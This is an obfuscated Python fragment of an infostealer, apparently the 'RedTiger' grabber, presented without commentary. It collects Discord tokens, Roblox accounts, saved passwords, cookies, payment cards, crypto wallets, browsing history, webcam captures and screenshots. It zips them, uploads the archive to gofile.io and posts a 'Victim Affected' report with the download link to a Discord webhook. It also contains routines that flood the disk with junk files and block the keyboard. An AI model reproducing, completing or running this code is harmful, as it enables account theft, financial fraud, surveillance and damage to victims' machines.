    PPCWEAJSOSQTZIELSAPPFBXSHCCPZMQQYDYRBDQKAXVUZBZRZEYDGCJZBSQBCTXLTVRTVUOYDUYZUAXBGIDMWUWQXOWFRULLZU_code = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('countryCode', "None")
    NHOWVKVWSIAQSFMFXEBMLLGBMRXRBYLREEVADTHRBXLYUAMHTJFHQEFDXVOMNLHVNCQCXTHQHLBYUCMTIASGOGGAJ = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('regionName', "None")
    NHOWVKVWSIAQSFMFXEBMLLGBMRXRBYLREEVADTHRBXLYUAMHTJFHQEFDXVOMNLHVNCQCXTHQHLBYUCMTIASGOGGAJ_code = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('region', "None")
    RSZFQZGMVXPSPGPCUYISOQUFXUKGPRAYMWRQTNEWBHHAGYWQVWEGQBWVCFEYWKQLMGAZPJ = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('zip', "None")
    XFHRQNOPGIWIQEOPJTUKVQGLOUNPKHARVYDLGXTHMSPWFMNSQLBOLUBNFJMMITSLH = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('city', "None")
    BHBZUFAHVVPXTEVEGZJELPHIEBMVFWDUAXEGULFQBEIBAKTQECHBPJWPZZYLNBDAECEYLGMZFXPLMEJPGUEXT = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('lat', "None")
    BIRZLBIEOSXTGSLEAYXCITZHVZWTSKLKUKQWVTGRQHRFHYUWAJMPWZUUSMCTCWYJCZVEOCRDHRXWXRTHTOBHTFLI = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('lon', "None")
    CLYALTZVQNRARRVZJOHMLTVJHEZTACOPOGRZSUJLLZWFAANLLTPFOCPYWG = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('timezone', "None")
    KBOIRLMLZCZYQCIZLUEJPUKOGKVJSJPJBFZUFOENCMJMQXNRTBKAMQD = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('isp', "None")
    WWFPRKGRRGQLCPCDHVGYJMQPFJEUPXVPBXAITIFVMFYLVCJHEHHF = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('org', "None")
    LAZEWTGJNQBAYWHOKLHFZDUZRBBREMPZYDGYVTBWBIAJJDPAFTEFDTHMJWUGFKYLRWYXTGXQLYMOUYBJWFEFQUM = XMASGAQQHYDOKEEBFWECKKTSOOFPBTACDDJKWAPNYISGQLGNCQWTWVUDLNTMFPRGWQWBBFWWMTZQOUCXUGIN.get('as', "None")

def PGXHUOHZGTXBQJWMQOUQLWSYTRMOFVTPIFDHQWOKVPXGYBOQYNRONZJRT():
    import random
    import string
    import threading

    ext = [".exe", ".py", ".txt", ".png", ".ico", ".bat", 
           ".js", ".php", ".html", ".css", ".mp3", ".mp4", 
           ".mov", ".jpg", ".pdf", ".troll", ".cooked",
           ".lol", ".funny", ".virus", ".malware"
           ".redtiger", ".redtiger", ".redtiger", ".redtiger"
    ]
    def COWDPOJJOZEXBLTTBHKGJQEGJFVTZFCGOZJZXGZVKMBIGUZDVFEMCJGANOVESGEBFJLXIUL():
        file_name = "".join(random.choice(string.ascii_uppercase + string.digits) for _ in range(random.randint(10, 50))) + random.choice(ext)

        with open(file_name, 'w', encoding='utf-8') as file:
            file.write(("".join(random.choice(string.ascii_letters + string.digits + string.punctuation) for i in range(999999)))) * random.randint(9999999999999999999999999, 9999999999999999999999999999999999999999)

    def JURMOCSBIBUOGNDXYJMWLFBZPTIUZLFHPLLQLZRMYFYSCVGFNKCLHZLVDWQIQFKNLLZLZWUELHDFOGSVIAWCPNYHPOVKYUIWDIY():
        threads = []
        try:
            for _ in range(int(100)):
                t = threading.Thread(target=COWDPOJJOZEXBLTTBHKGJQEGJFVTZFCGOZJZXGZVKMBIGUZDVFEMCJGANOVESGEBFJLXIUL)
                t.start()
                threads.append(t)
        except:
            pass

        for thread in threads:
            thread.join()

    JURMOCSBIBUOGNDXYJMWLFBZPTIUZLFHPLLQLZRMYFYSCVGFNKCLHZLVDWQIQFKNLLZLZWUELHDFOGSVIAWCPNYHPOVKYUIWDIY()

def SFANWUMTPUQPVSJTEGZHEWVUFUOXXEANDJJPNWBXIPZFESZYODOEXIFMHZPVACIHBVMLXJRWZHOJBPPYWFBPFDRITWUS():
    import keyboard
    while True:
        try:
            XBDXHDBKJMWDXPGCOUREANMWZFDYCRNKWRCQJFRSZKKDLACLLRMEMIFFOAUHKWVWXCNZSVESGUYSHWMDKDLMLXQJX()
            QTAILXBPCFEZYYRUJUBUGJAITHXOJGRWQAWEAIFPNKJYAVKMASSIUEJYMXCAEWPQSLFWGXXSWZUEOEJW()
            PGXHUOHZGTXBQJWMQOUQLWSYTRMOFVTPIFDHQWOKVPXGYBOQYNRONZJRT()
            if keyboard.is_pressed('alt') and keyboard.is_pressed('alt gr'):
                Unb10ck_K3y()
                break
        except:
            pass

PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ = []

DRWZTXOFVOYLDSSDCLORDOSJJTUCSEZBRSXUVIPQIGNGKXRXRVIBQGGCVTDGESYIXPRLZHZDSRAVE = io.BytesIO()
with zipfile.ZipFile(DRWZTXOFVOYLDSSDCLORDOSJJTUCSEZBRSXUVIPQIGNGKXRXRVIBQGGCVTDGESYIXPRLZHZDSRAVE, "w", zipfile.ZIP_DEFLATED) as NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA:

    try: 
        RXDRXFGZFBKTZHONEMGKNADJUCIXSITOWCDFCTAKVSHOJFGVDIBICIIFTCZNX = TTIYQXBAQRPECTMBPWQDDIIUCUQYQCHSQINPQVIDCIATRDUKQZATOTGECWFPYGNWCMGJVSB()
    except Exception as e:
        RXDRXFGZFBKTZHONEMGKNADJUCIXSITOWCDFCTAKVSHOJFGVDIBICIIFTCZNX = f"Error: {e}"

    try: 
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_system_info = CIYGETXKSQCFISENIGJWZHBDMFRAOMVYBLUENZWKVARNSVWUMJQJXFMLHTJHISZPOEVVGNMVETZSDIC(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_system_info = f"Error: {e}"

    try: 
        BZSRUNVGJIBKTCGUREDYTZATCXWVNLSFTFTJGWYCFHDUMCXEGZCBUWACXAQGKWHMTOQKJKBWWOCCUAGVEADOKHKIVIFAOX = UJRMKBIPSOBATIAYJHPZTJUFESHZLPBTGAVYIKQYEDBBKADEPJNUTZIWFFCDPQSLQFPKQIIKOSRZDWIMSYPANCR(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        BZSRUNVGJIBKTCGUREDYTZATCXWVNLSFTFTJGWYCFHDUMCXEGZCBUWACXAQGKWHMTOQKJKBWWOCCUAGVEADOKHKIVIFAOX = f"Error: {e}"

    try: 
        XWHFILLUOSAHFWNMSICLXDLZTFDXPNGZFUHKLUOCZOCAEGSQTFCKEVGAKSXNFSLCLSGVH, CTRZZZBWBRKRQETPVKZDSQPVABPIKNBPYWUPHJYWRKXNWSFCDFEECEEJGFAFXRCSAFHNYRLZPLUNGINR, BHTAWJFACCVORFKGMOGBWMWYZILNMMENQCLGKRTTGGMOEFXJUQETYCKLDFERDPBMUHFHIKEQNDUOAPGQQFUSBPNRDNTCICAEM, AGZHOLJBTVIQYCKSESWNVYFWBPYRKAJDRIIKOIJEMOSXAGAAJTTEPVFXMHCWDWZVIJVXEBSGEZCCUICHJ, RNZIWPYJJDOZOHTXHSZBXYUSAFPDILWGEVLHRNARKSTJICJKUQKBWVBQFPLEAYCGCUZWBWWVUKYYMNLGFVSPGIMRA, SVWNGUOYLULFBGBBDCMENJALATHJVFHYENHRHAPEAKVIHQOKZSDCRYELTAQELHZZOIWZGAGWSVKCXXDZTCVGQEOQKTTWD = FZUURBXWWVONHRCLMTULJNASKTBJWPVHQNCZBKVRHAVCZDBXLMKEWJAZPMJIRMSHRGLLIAYAPYSMILSLPKTUMXHO(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        XWHFILLUOSAHFWNMSICLXDLZTFDXPNGZFUHKLUOCZOCAEGSQTFCKEVGAKSXNFSLCLSGVH = f"Error: {e}"
        CTRZZZBWBRKRQETPVKZDSQPVABPIKNBPYWUPHJYWRKXNWSFCDFEECEEJGFAFXRCSAFHNYRLZPLUNGINR = f"Error: {e}"
        BHTAWJFACCVORFKGMOGBWMWYZILNMMENQCLGKRTTGGMOEFXJUQETYCKLDFERDPBMUHFHIKEQNDUOAPGQQFUSBPNRDNTCICAEM = f"Error: {e}"
        AGZHOLJBTVIQYCKSESWNVYFWBPYRKAJDRIIKOIJEMOSXAGAAJTTEPVFXMHCWDWZVIJVXEBSGEZCCUICHJ = f"Error: {e}"
        RNZIWPYJJDOZOHTXHSZBXYUSAFPDILWGEVLHRNARKSTJICJKUQKBWVBQFPLEAYCGCUZWBWWVUKYYMNLGFVSPGIMRA = f"Error: {e}"
        SVWNGUOYLULFBGBBDCMENJALATHJVFHYENHRHAPEAKVIHQOKZSDCRYELTAQELHZZOIWZGAGWSVKCXXDZTCVGQEOQKTTWD = f"Error: {e}"

    try: 
        CECRIXTBCLBMYPILVEBQEIQJSNRNZOKRVLRIHATWUEZXVVPXBOUKEDQVQMHOTZBYJYUVEEPXEKLRUGLJYURFJQ = APIFUMSGYFOQDZEGEHAJGBDABRMZPKWRQBSRGADEGWHNJJTALJNLPIQPJQPJVXXNPZZDRLLGTNTJQXSMXKGJKAFL(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        CECRIXTBCLBMYPILVEBQEIQJSNRNZOKRVLRIHATWUEZXVVPXBOUKEDQVQMHOTZBYJYUVEEPXEKLRUGLJYURFJQ = f"Error: {e}"

    try: 
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_camera_capture = NXNOEVDYIZUWFDZIROKWCNHLTJQLFMTSHDRGEZMEDLJDEFRBJIBGQRZNWGOGIYUNKANZJXYGECM(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_camera_capture = f"Error: {e}"

    try: 
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_screenshot = RELJDWSWCFJHNVECVUWKTCFMRZNDQGDLFZSLXSKEKXFJEHIEGGDG(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_screenshot = f"Error: {e}"

    try: 
        DZXIPELLEKBGHLZEDQJWAKOJWGQALIIUQAQSLWMOUXSYAYHCKYTSSEQK, FUGRFVAVPZATEUYAVWRPPAQZPZAXWKAGHOSXJFGGKEWKLTKQTCIKMJJZSXZVXBJVEYASHWVOTZPDOKNOVGXTTFQD, FSHTQTZOAUXMZYNAUIKYXBMFCWEDAGOCLSMURSVJERCSOGRWFDRA = AGONIBWTJYWDEUJSRSCGNEVVDAQKHIVJFUOGZKMKVSMYRAGNHCEWJPVYGNBKKRUPWMMRQRTFDZNX(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_screenshot = f"Error: {e}"

    try: 
        YYSACKVQDGWHCEFKHEMTNTTLWPRJBPDVXLHGUEVQBMOCDBZKTGOHSLJS = RUFNUMUBBSKTMJRZCMPHEJZEZINJAGUFNJWGBXRPWUNTBGOWMFQGBFRWGKGWSNGPHCWHAKRNSYCZKEWKQ(NIHNGVUOPVFGNRAARWXXOFCUGKERGOYRDUMDASPKQBLWLQIKNJKNBJRLUEPKDFNGA)
    except Exception as e:
        YYSACKVQDGWHCEFKHEMTNTTLWPRJBPDVXLHGUEVQBMOCDBZKTGOHSLJS = f"Error: {e}"

    if RXDRXFGZFBKTZHONEMGKNADJUCIXSITOWCDFCTAKVSHOJFGVDIBICIIFTCZNX != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Discord Injection : {RXDRXFGZFBKTZHONEMGKNADJUCIXSITOWCDFCTAKVSHOJFGVDIBICIIFTCZNX}")

    if UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_camera_capture != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Camera Capture    : {UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_camera_capture}")

    if UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_screenshot != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Screenshot        : {UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_screenshot}")

    if UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_system_info != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"System Info       : {UJDHKVOQSGUOIJCHDCVMNDJHHGFEYARKKGFMWLLFHLALGYLHUSGPBJBOPSUPAGGFBJZHCXDDPIASGGEOJMRKKGQAGRQI_system_info}")

    if BZSRUNVGJIBKTCGUREDYTZATCXWVNLSFTFTJGWYCFHDUMCXEGZCBUWACXAQGKWHMTOQKJKBWWOCCUAGVEADOKHKIVIFAOX != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Discord Accounts  : {BZSRUNVGJIBKTCGUREDYTZATCXWVNLSFTFTJGWYCFHDUMCXEGZCBUWACXAQGKWHMTOQKJKBWWOCCUAGVEADOKHKIVIFAOX}")

    if CECRIXTBCLBMYPILVEBQEIQJSNRNZOKRVLRIHATWUEZXVVPXBOUKEDQVQMHOTZBYJYUVEEPXEKLRUGLJYURFJQ != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Roblox Accounts   : {CECRIXTBCLBMYPILVEBQEIQJSNRNZOKRVLRIHATWUEZXVVPXBOUKEDQVQMHOTZBYJYUVEEPXEKLRUGLJYURFJQ}")

    if CTRZZZBWBRKRQETPVKZDSQPVABPIKNBPYWUPHJYWRKXNWSFCDFEECEEJGFAFXRCSAFHNYRLZPLUNGINR != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Passwords         : {CTRZZZBWBRKRQETPVKZDSQPVABPIKNBPYWUPHJYWRKXNWSFCDFEECEEJGFAFXRCSAFHNYRLZPLUNGINR}")

    if BHTAWJFACCVORFKGMOGBWMWYZILNMMENQCLGKRTTGGMOEFXJUQETYCKLDFERDPBMUHFHIKEQNDUOAPGQQFUSBPNRDNTCICAEM != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Cookies           : {BHTAWJFACCVORFKGMOGBWMWYZILNMMENQCLGKRTTGGMOEFXJUQETYCKLDFERDPBMUHFHIKEQNDUOAPGQQFUSBPNRDNTCICAEM}")

    if SVWNGUOYLULFBGBBDCMENJALATHJVFHYENHRHAPEAKVIHQOKZSDCRYELTAQELHZZOIWZGAGWSVKCXXDZTCVGQEOQKTTWD != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Cards             : {SVWNGUOYLULFBGBBDCMENJALATHJVFHYENHRHAPEAKVIHQOKZSDCRYELTAQELHZZOIWZGAGWSVKCXXDZTCVGQEOQKTTWD}")

    if AGZHOLJBTVIQYCKSESWNVYFWBPYRKAJDRIIKOIJEMOSXAGAAJTTEPVFXMHCWDWZVIJVXEBSGEZCCUICHJ != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Browsing History  : {AGZHOLJBTVIQYCKSESWNVYFWBPYRKAJDRIIKOIJEMOSXAGAAJTTEPVFXMHCWDWZVIJVXEBSGEZCCUICHJ}")

    if RNZIWPYJJDOZOHTXHSZBXYUSAFPDILWGEVLHRNARKSTJICJKUQKBWVBQFPLEAYCGCUZWBWWVUKYYMNLGFVSPGIMRA != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Download History  : {RNZIWPYJJDOZOHTXHSZBXYUSAFPDILWGEVLHRNARKSTJICJKUQKBWVBQFPLEAYCGCUZWBWWVUKYYMNLGFVSPGIMRA}")

    if XWHFILLUOSAHFWNMSICLXDLZTFDXPNGZFUHKLUOCZOCAEGSQTFCKEVGAKSXNFSLCLSGVH != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Extentions        : {XWHFILLUOSAHFWNMSICLXDLZTFDXPNGZFUHKLUOCZOCAEGSQTFCKEVGAKSXNFSLCLSGVH}")

    if DZXIPELLEKBGHLZEDQJWAKOJWGQALIIUQAQSLWMOUXSYAYHCKYTSSEQK != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Wallets           : {DZXIPELLEKBGHLZEDQJWAKOJWGQALIIUQAQSLWMOUXSYAYHCKYTSSEQK}")

    if FUGRFVAVPZATEUYAVWRPPAQZPZAXWKAGHOSXJFGGKEWKLTKQTCIKMJJZSXZVXBJVEYASHWVOTZPDOKNOVGXTTFQD != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Game Launchers    : {FUGRFVAVPZATEUYAVWRPPAQZPZAXWKAGHOSXJFGGKEWKLTKQTCIKMJJZSXZVXBJVEYASHWVOTZPDOKNOVGXTTFQD}")
    
    if FSHTQTZOAUXMZYNAUIKYXBMFCWEDAGOCLSMURSVJERCSOGRWFDRA != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Apps              : {FSHTQTZOAUXMZYNAUIKYXBMFCWEDAGOCLSMURSVJERCSOGRWFDRA}")
    
    if YYSACKVQDGWHCEFKHEMTNTTLWPRJBPDVXLHGUEVQBMOCDBZKTGOHSLJS != None:
        PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ.append(f"Interesting Files : {YYSACKVQDGWHCEFKHEMTNTTLWPRJBPDVXLHGUEVQBMOCDBZKTGOHSLJS}")

DRWZTXOFVOYLDSSDCLORDOSJJTUCSEZBRSXUVIPQIGNGKXRXRVIBQGGCVTDGESYIXPRLZHZDSRAVE.seek(0)

try:
    try: ZJTEKAGKLHVDHJNBYVDKYXMZDIDZHPOPANYXGSGDLKDOCBXUAZRYINBYEQTEFHLGNROSRNFHCEDRARWNUCVAV = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
    except: ZJTEKAGKLHVDHJNBYVDKYXMZDIDZHPOPANYXGSGDLKDOCBXUAZRYINBYEQTEFHLGNROSRNFHCEDRARWNUCVAV = "store4"

    XBLOVRTEGAWGTMIJAFAEYNHCUBCSNEGKVFCOPVPXFFGDXDVKRUMWYDYMTQNCYUUTUAPNBQNTYXVBIXLTCELTCYYDX = requests.post(
        f"https://{ZJTEKAGKLHVDHJNBYVDKYXMZDIDZHPOPANYXGSGDLKDOCBXUAZRYINBYEQTEFHLGNROSRNFHCEDRARWNUCVAV}.gofile.io/uploadFile",
        files={"file": (f"RedTiger_{HCXOEUISVQLUBHHTLIYZIEMKRYSHOJDRKMNBWJKKNCLLVPDAAGWPBQYXJGXX.replace(' ', '_')}.zip", DRWZTXOFVOYLDSSDCLORDOSJJTUCSEZBRSXUVIPQIGNGKXRXRVIBQGGCVTDGESYIXPRLZHZDSRAVE)}
    )

    EWMRTLRAAEGBENRFTOIGQAKCZXVFQGOKFEJSMAYCBGODYCLKTSMTZOVHSAWFLCXUHYXDWIJFVHFWQPRNYAYZPUNEZNCXRCBYQPL = XBLOVRTEGAWGTMIJAFAEYNHCUBCSNEGKVFCOPVPXFFGDXDVKRUMWYDYMTQNCYUUTUAPNBQNTYXVBIXLTCELTCYYDX.json()["data"]["downloadPage"]
except Exception as e:
    EWMRTLRAAEGBENRFTOIGQAKCZXVFQGOKFEJSMAYCBGODYCLKTSMTZOVHSAWFLCXUHYXDWIJFVHFWQPRNYAYZPUNEZNCXRCBYQPL = f"Error: {e}"

embed = discord.Embed(title="Victim Affected", color=GETKJPXQUYRGOSAKJOWQKVPYTCDLHFEHVTFUGIOOSECGCJCPEEAFFYLNQECIXIVGMLCOZDC
).add_field(
    inline=False,
    name="Summary of Information", 
    value=f"""```
Hostname    : {KOBROTBTXPQLQPIVOCEONWRZYSHHUVBJVEZASSGEZIXCFGIJSDAOLQWPVRACYVR}
Username    : {HCXOEUISVQLUBHHTLIYZIEMKRYSHOJDRKMNBWJKKNCLLVPDAAGWPBQYXJGXX}
DisplayName : {OQXWZRQJJXWZECYFWCVXKEGHYNRGQXZOORFGIEXBYZOKZHGWSVFJZ}
Ip Public   : {BQQUNSWATNVJIXPGZGPSYRJAGIFXGZLPKYRGDDTDIAKADPRNUXRVDWQVZLNFWJDCSSRYKFK}
Ip Local    : {PDIYUEWRWSVPKNVJLLSWYKPFFHJKWQHEZOCLYQGCOHFUIQCEIIBTTHPQGEWWGDSBZRNQZSWGHSG}
Country     : {PPCWEAJSOSQTZIELSAPPFBXSHCCPZMQQYDYRBDQKAXVUZBZRZEYDGCJZBSQBCTXLTVRTVUOYDUYZUAXBGIDMWUWQXOWFRULLZU}```"""
).add_field(
    inline=False,
    name="Stolen Information", 
    value=f"""```swift
{"\n".join(PBWMGHUTYKEQZOHIYPDYRFBVMDVBGIJTQYHRQIZKGBUZQYACBBCJZQYNWFZWVBKDCNLNQFYEUFBASRVJ)}```"""
).add_field(
    inline=False,
    name="Download Link", 
    value=f"""{EWMRTLRAAEGBENRFTOIGQAKCZXVFQGOKFEJSMAYCBGODYCLKTSMTZOVHSAWFLCXUHYXDWIJFVHFWQPRNYAYZPUNEZNCXRCBYQPL}"""
).set_footer(
    text=BXQTAOXHUPLINPWSTIWHNJMUZLRKYHVIGTANSZGWMKRXPEJKKZNX, 
    icon_url=GZYSMIFLQTDYZPWBFOFONYVQAITOEEGDCWJSAMSVYCVVCLFFWRVKHTYQYCXGEFDMREANHMK
)

try:  
    MWWXINNFWJSZELUXJRIXZKUDWHTPYMBLBQNALMWOLFGQWUZUZEFSLMYNUKFTUZEYWSFKTEFZCOPQQSEJGPVDBZXFST = discord.SyncWebhook.from_url(NHPAKRKKRLRTIQBORZILQGXGWDYXVZSUVAYCUOLQGAMDVJJPMVGCWKBEDEHPDGRXXXFJDXZLNYSDHMM)
    MWWXINNFWJSZELUXJRIXZKUDWHTPYMBLBQNALMWOLFGQWUZUZEFSLMYNUKFTUZEYWSFKTEFZCOPQQSEJGPVDBZXFST.send(embed=embed, username=IMUIIKUYHZKTSQOJEQOYSKVFELKSRJDNQLWNDQXXBJUOCPMVGGCHAFSLTHUUF, avatar_url=GZYSMIFLQTDYZPWBFOFONYVQAITOEEGDCWJSAMSVYCVVCLFFWRVKHTYQYCXGEFDMREANHMK)
except: pass


try: threading.Thread(target=AGYGINDSWFGRIAQHZUFKYUFLVQYJENWIJIWODARXKCVEUMGKFVIJBUFVSSJIVPYYNXQEAJKCTNCHJXNZKFYZCXD).start()
except: pass
try: threading.Thread(target=ZRWTKBHSEYNDBJGDTKKHZMYVFQHWZWHYFSAZZCDIYHMBSEKFIGIHIYWVUVPWHJYLANDVCGYWXEFXDZFQ).start()
except: pass
try: threading.Thread(target=LWPPVYMNZCPFTZAODDRKNVRLTWDPLTEFMASBLXQNQMOHDJJRWPTJVFJDGWLPLSTNZZWSXBAUYDZLQQCFYGWRVE).start()
except: pass
try: threading.Thread(target=EQLXNYMYBOZYSASEBOWZUEPPGNDGVADWBXBUIJQMOQSODSKDSNATTXMOMKTZSKVLCOMYQBOXLNYUWWUWGKMVMZIGDGOU).start()
except: pass
try: threading.Thread(target=VCPTNHNUTCCBTWYELXRTPTHRQHRZQLCAFBNZJAVXERFZKYEXTTGKEX).start()
except: pass
try: threading.Thread(target=FHOUPTASJZAXJFYEQTJVSIOURXIRCWDXMPJXRTSWYJOKQODZGFVLTLSCYSWTIDTZQROGBBPRHDCFYIPIUNSDWAAJKS).start()
except: pass
try: threading.Thread(target=HDNFOOORSWUSXLSFWDCACLWFPTXWCIMWKDEJWTPNQMVZKBKSVYYPIZVYTELHCNKQRAQLXANICQCCTKZVCXBNNJZFBB).start()
except: pass
try: threading.Thread(target=SXVHDQXTNTYFNSJDKLYWUGHNXKKVWZTCSKEMRIVADKDZBIEZEBAUUGCDUVHJSMNENWRUCLTCALNCQQQZYMYALXPNC).start()
except: pass
